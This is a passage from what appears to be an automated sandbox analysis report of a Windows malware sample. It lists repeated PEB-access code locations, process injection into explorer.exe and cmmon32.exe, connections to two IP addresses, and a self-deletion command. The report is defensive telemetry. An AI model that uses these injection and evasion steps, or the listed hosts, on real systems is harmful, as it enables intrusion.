                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C6A6 mov eax, dword ptr fs:[00000030h]11_2_0105C6A6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010566B0 mov eax, dword ptr fs:[00000030h]11_2_010566B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0105A6C7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A6C7 mov eax, dword ptr fs:[00000030h]11_2_0105A6C7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A06F1 mov eax, dword ptr fs:[00000030h]11_2_010A06F1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A06F1 mov eax, dword ptr fs:[00000030h]11_2_010A06F1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E908 mov eax, dword ptr fs:[00000030h]11_2_0109E908
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E908 mov eax, dword ptr fs:[00000030h]11_2_0109E908
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC912 mov eax, dword ptr fs:[00000030h]11_2_010AC912
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018918 mov eax, dword ptr fs:[00000030h]11_2_01018918
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018918 mov eax, dword ptr fs:[00000030h]11_2_01018918
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A892A mov eax, dword ptr fs:[00000030h]11_2_010A892A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B892B mov eax, dword ptr fs:[00000030h]11_2_010B892B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A0946 mov eax, dword ptr fs:[00000030h]11_2_010A0946
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4940 mov eax, dword ptr fs:[00000030h]11_2_010F4940
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov eax, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov edx, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov eax, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4978 mov eax, dword ptr fs:[00000030h]11_2_010C4978
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4978 mov eax, dword ptr fs:[00000030h]11_2_010C4978
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC97C mov eax, dword ptr fs:[00000030h]11_2_010AC97C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD mov eax, dword ptr fs:[00000030h]11_2_010209AD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD mov eax, dword ptr fs:[00000030h]11_2_010209AD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov esi, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov eax, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov eax, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B69C0 mov eax, dword ptr fs:[00000030h]11_2_010B69C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010549D0 mov eax, dword ptr fs:[00000030h] | 11_2_010549D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010EA9D3 mov eax, dword ptr fs:[00000030h] | 11_2_010EA9D3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010AE9E0 mov eax, dword ptr fs:[00000030h] | 11_2_010AE9E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010529F9 mov eax, dword ptr fs:[00000030h] | 11_2_010529F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010529F9 mov eax, dword ptr fs:[00000030h] | 11_2_010529F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010AC810 mov eax, dword ptr fs:[00000030h] | 11_2_010AC810
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov eax, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov eax, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov eax, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov ecx, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov eax, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01042835 mov eax, dword ptr fs:[00000030h] | 11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105A830 mov eax, dword ptr fs:[00000030h] | 11_2_0105A830
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C483A mov eax, dword ptr fs:[00000030h] | 11_2_010C483A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C483A mov eax, dword ptr fs:[00000030h] | 11_2_010C483A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01032840 mov ecx, dword ptr fs:[00000030h] | 11_2_01032840
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01050854 mov eax, dword ptr fs:[00000030h] | 11_2_01050854
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01024859 mov eax, dword ptr fs:[00000030h] | 11_2_01024859
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01024859 mov eax, dword ptr fs:[00000030h] | 11_2_01024859
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010AE872 mov eax, dword ptr fs:[00000030h] | 11_2_010AE872
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010AE872 mov eax, dword ptr fs:[00000030h] | 11_2_010AE872
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B6870 mov eax, dword ptr fs:[00000030h] | 11_2_010B6870
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B6870 mov eax, dword ptr fs:[00000030h] | 11_2_010B6870
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01020887 mov eax, dword ptr fs:[00000030h] | 11_2_01020887
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010AC89D mov eax, dword ptr fs:[00000030h] | 11_2_010AC89D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104E8C0 mov eax, dword ptr fs:[00000030h] | 11_2_0104E8C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F08C0 mov eax, dword ptr fs:[00000030h] | 11_2_010F08C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010EA8E4 mov eax, dword ptr fs:[00000030h] | 11_2_010EA8E4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105C8F9 mov eax, dword ptr fs:[00000030h] | 11_2_0105C8F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105C8F9 mov eax, dword ptr fs:[00000030h] | 11_2_0105C8F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F4B00 mov eax, dword ptr fs:[00000030h] | 11_2_010F4B00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h] | 11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104EB20 mov eax, dword ptr fs:[00000030h] | 11_2_0104EB20
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104EB20 mov eax, dword ptr fs:[00000030h] | 11_2_0104EB20
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E8B28 mov eax, dword ptr fs:[00000030h] | 11_2_010E8B28
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E8B28 mov eax, dword ptr fs:[00000030h] | 11_2_010E8B28
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D4B4B mov eax, dword ptr fs:[00000030h] | 11_2_010D4B4B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D4B4B mov eax, dword ptr fs:[00000030h] | 11_2_010D4B4B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B6B40 mov eax, dword ptr fs:[00000030h] | 11_2_010B6B40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B6B40 mov eax, dword ptr fs:[00000030h] | 11_2_010B6B40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010EAB40 mov eax, dword ptr fs:[00000030h] | 11_2_010EAB40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C8B42 mov eax, dword ptr fs:[00000030h] | 11_2_010C8B42
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01018B50 mov eax, dword ptr fs:[00000030h] | 11_2_01018B50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h] | 11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h] | 11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h] | 11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h] | 11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CEB50 mov eax, dword ptr fs:[00000030h] | 11_2_010CEB50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101CB7E mov eax, dword ptr fs:[00000030h] | 11_2_0101CB7E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01030BBE mov eax, dword ptr fs:[00000030h] | 11_2_01030BBE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01030BBE mov eax, dword ptr fs:[00000030h] | 11_2_01030BBE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D4BB0 mov eax, dword ptr fs:[00000030h] | 11_2_010D4BB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010D4BB0 mov eax, dword ptr fs:[00000030h] | 11_2_010D4BB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h] | 11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h] | 11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h] | 11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h] | 11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h] | 11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h] | 11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CEBD0 mov eax, dword ptr fs:[00000030h] | 11_2_010CEBD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h] | 11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h] | 11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h] | 11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104EBFC mov eax, dword ptr fs:[00000030h] | 11_2_0104EBFC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010ACBF0 mov eax, dword ptr fs:[00000030h] | 11_2_010ACBF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010ACA11 mov eax, dword ptr fs:[00000030h] | 11_2_010ACA11
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105CA24 mov eax, dword ptr fs:[00000030h] | 11_2_0105CA24
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104EA2E mov eax, dword ptr fs:[00000030h] | 11_2_0104EA2E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01044A35 mov eax, dword ptr fs:[00000030h] | 11_2_01044A35
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01044A35 mov eax, dword ptr fs:[00000030h] | 11_2_01044A35
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105CA38 mov eax, dword ptr fs:[00000030h] | 11_2_0105CA38
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h] | 11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01030A5B mov eax, dword ptr fs:[00000030h] | 11_2_01030A5B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01030A5B mov eax, dword ptr fs:[00000030h] | 11_2_01030A5B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h] | 11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h] | 11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h] | 11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CEA60 mov eax, dword ptr fs:[00000030h] | 11_2_010CEA60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109CA72 mov eax, dword ptr fs:[00000030h] | 11_2_0109CA72
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109CA72 mov eax, dword ptr fs:[00000030h] | 11_2_0109CA72
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h] | 11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F4A80 mov eax, dword ptr fs:[00000030h] | 11_2_010F4A80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01058A90 mov edx, dword ptr fs:[00000030h] | 11_2_01058A90
                Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00335649 GetCurrentProcessId,OpenProcess,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetLastError,FreeLibrary,GetLastError,OpenEventW,SetEvent,CloseHandle,GetLastError,GetLastError, | 14_2_00335649
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00337020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 14_2_00337020
                Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_003371B0 SetUnhandledExceptionFilter, | 14_2_003371B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe | Network Connect: 172.96.187.60 80
                Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | NtClose: Indirect: 0xFAA56C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | NtQueueApcThread: Indirect: 0xFAA4F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Memory written: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Thread register set: target process: 4056
                Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 4056
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Thread APC queued: target process: C:\Windows\explorer.exe
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 330000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: explorer.exe, 0000000C.00000003.3078129263.000000000901E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271650261.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: explorer.exe, 0000000C.00000002.3720362421.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1300394418.0000000000C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
